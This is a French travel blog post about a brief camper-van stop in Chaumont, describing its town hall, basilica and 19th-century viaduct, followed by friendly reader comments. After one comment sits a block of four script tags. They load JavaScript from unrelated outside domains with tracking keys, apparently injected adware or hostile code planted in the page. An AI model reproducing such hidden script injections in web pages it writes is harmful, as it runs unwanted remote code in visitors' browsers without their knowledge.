• CHAUMONT

     

     

    CHAUMONT

     

     

    Je vous emmène à Chaumont...

    Chaumont est une commune française située dans le département de la Haute-Marne (dont elle est la préfecture) elle a conservé de son époque médiévale un charme pittoresque...

     

    Je ne vous en dirai pas plus car, ce fut, pour nous une simple ville étape.... (Pas beaucoup de photos donc !)... Nous avons juste été faire un tour dans la ville toute en montée, pour redescendre voir le viaduc....

     

     

    CHAUMONT

     

     

    l’Hôtel de Ville et sa Place

     

     

    CHAUMONT

     

     

    La Basilique St Jean-Baptiste...

     

     

    CHAUMONT

     

     

     

     

    CHAUMONT

     

     

     

     

    Et un bout du long viaduc.... Ses dimensions (600 m de long, 50 arches sur une hauteur de 52 m) en font l’un des plus remarquables ouvrages d’art du milieu du XIXème siècle en Europe, sinon dans le monde.

    Conçu par l’architecte Eugène Decomble
    , Il est construit en quinze mois entre 1855 et 1856.

     

     

    CHAUMONT

     

     

    CHAUMONT

     

     

    Nous avons passé un très bon moment, dans un camping-municipal très calme....

     

     

    cliquez sur l'image pour la voir en plus grande...

     

     

    CHAUMONT

     

     

    CHAUMONT

     

     

     

     

    CHAUMONT

     

     

     

     

    CHAUMONT

     

    ( Dans la Rubrique "Bisous"-"été"- ICI )

     

     


    Tags Tags : , , ,
  • Commentaires

    21
    Mardi 18 Août 2020 à 19:47

    Bonsoir ma chère Valie

    Un petit coucou pour te souhaiter une bonne soirée 

    gros bisous et à bientôt

    Janine

    20
    Mardi 18 Août 2020 à 13:07

    Tes articles sentent bon la positivité et la joie de vivre !! Un vrai plaisir de te lire et de découvrir en compagnie de ta petite famille !! J'apprécie le voyage !! Merci pour ces jolies photos !! La maison peinte est particulièrement superbe !

    Bisous Bisous

    19
    Mardi 18 Août 2020 à 07:23

    Impressionnant ce viaduc et un petit camping bien agréable ! Merci pour le partage Valie !

    Bisous bisous !

    18
    Mardi 18 Août 2020 à 01:12

    une belle ballade qui ne m'aurait pas déplu... et un camping vraiment calme... merci de nous daire voyager en même temps que toi lol .. gros gros bisous

    17
    Mardi 18 Août 2020 à 00:13

    Chaumont, pas si loin de chez moi, juste 1h30 et si ça se trouve tu es  passée dans ma ville de Troyes ?

    Chaumont, je ne connais pas, tu y crois ? on cavale partout et on ne connait pas les départements limitrophe au sien...

    Effectivement, le camping était très calme, là au moins pas de problème de distanciation sociale !

    Gros bisous

    16
    Lundi 17 Août 2020 à 20:59

    Bonsoir ma douce Valie

    Merci pour ces belles photos de tes vacances

    sympa ce camping 

    Bonne soirée et gros bisous et prends bien soin de toi

    Janine

    15
    Lundi 17 Août 2020 à 19:54

    Merci pour ces jolies photos d'une de vos étapes

    Bisous Pierrette67

    14
    Lundi 17 Août 2020 à 19:21

    Une halte fort sympa !!! Merci pour le partage ma Belle !!

    Douce soirée, Mille Bisous.

    13
    Jour de Mai
    Lundi 17 Août 2020 à 17:29

    Coucou Valie, 

    Pas très en avance mais je passe te dire que tu nous as encore fait un joli article, une région que je ne connais pas du tout mais qui a le mérite d'avoir un beau patrimoine et ce camping, super, on respecte les distances, peu de monde, tout pour plaire.

    Merci pour ce joli partage et surtout belle semaine entre soleil et pluie. 

    De très gros bisous ♥♥♥♥♥

    LN

    12
    Lundi 17 Août 2020 à 16:32

    C'est une très belle petite ville ma Valie avec des architectures anciennes, j'aime beaucoup. Merci, passe une bonne semaine, bisou rose tendresse !

    11
    mamijojo77100
    Lundi 17 Août 2020 à 16:29

    On decouvre avec toi plein de contrees differentes. encore une belle ville a visiter surtout sa basilique..

    on attend la suite surtout quand on ne part pas comme nous!! gbisous joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1597674417947" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    10
    Lundi 17 Août 2020 à 16:15

    T'as même pas fait un tour de manège, c'est pas de chance pour toi

    Par contre au camping super, pas de voisins proche l'idéal des vacances tranquilles

    Merci pour ce nouveau partage

    Bon début de semaine

    Gros bisous

    9
    Lundi 17 Août 2020 à 15:59

    voila un bel endroit, c est agreable le calme

    bisous

    8
    Lundi 17 Août 2020 à 14:46
    lamanuelle25

    Le tout en montée ne m'irait pas trop mais jolie ville quand même!! Bises Nadine

    7
    Lundi 17 Août 2020 à 14:10

    Une ville que je connais un peu car notre fille aînée habite à Saint-Dizier, ville proche.

    Bonne semaine ; bises / Nicole

    6
    Lundi 17 Août 2020 à 13:58

    Une belle étape !

    Bonne fin de journée.
    Bises.

    5
    Lundi 17 Août 2020 à 13:48

    Bonjour Valie Merci pour ce très bel article, tout y est, photos et renseignements

    Passe une bonne semaine

    Bisous de Pat

    4
    marianne pirotte
    Lundi 17 Août 2020 à 13:19

    Merci pour ce beau partage, très jolie la basilique !!

    Gros bisous

    Marianne

    3
    Lundi 17 Août 2020 à 11:08

    Sympa ce viaduc. Je ne connais pas du tout Chaumont. 

    Bises

    Thaly

    2
    Lundi 17 Août 2020 à 10:18

    J adore ton petit camping car ma Valie en réel et en creation il me donne le sourire et ça fait du bien un peu de sourire, la basilique de Chaumont est magnifique mais je suis fan des viaducs celui ci est de toute beauté , et tu as su le mettre en valeur, parfois il y a des étapes marquantes, l orage est passé hier dans le Vaucluse et avec les lui des pluies dilluviennes , ce matin avant de partir, jardin et balcons arrosés et un peu de fraicheur bisous tendresse ma douce 

    1
    Jacline-H-49
    Lundi 17 Août 2020 à 10:10

    Bonjour chère Valie,

    Peu de photos, mais de qualité. On en apprend quand même sur cette ville, grâce à toi, comme ce viaduc magnifique, cette belle église, ce joli bâtiment hôtel de ville, dont la place est bien fréquentée, encore plus en période de canicule. Il a l'air impeccable ce camping municipal et a de l'ombre.

    J'espère que tu as passé un bon W.E. malgré qq orages, et que tu as bien dormi. Ce matin des nuages prometteurs de pluie sont là. La fraîcheur est revenue, je vais me méfier pour midi ! hi hi  ! 

    Bonne journée à toi et bonne semaine en prenant soin de toi.

    GROS BISOUS TENDRESSE de 

    Jacline 

     

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :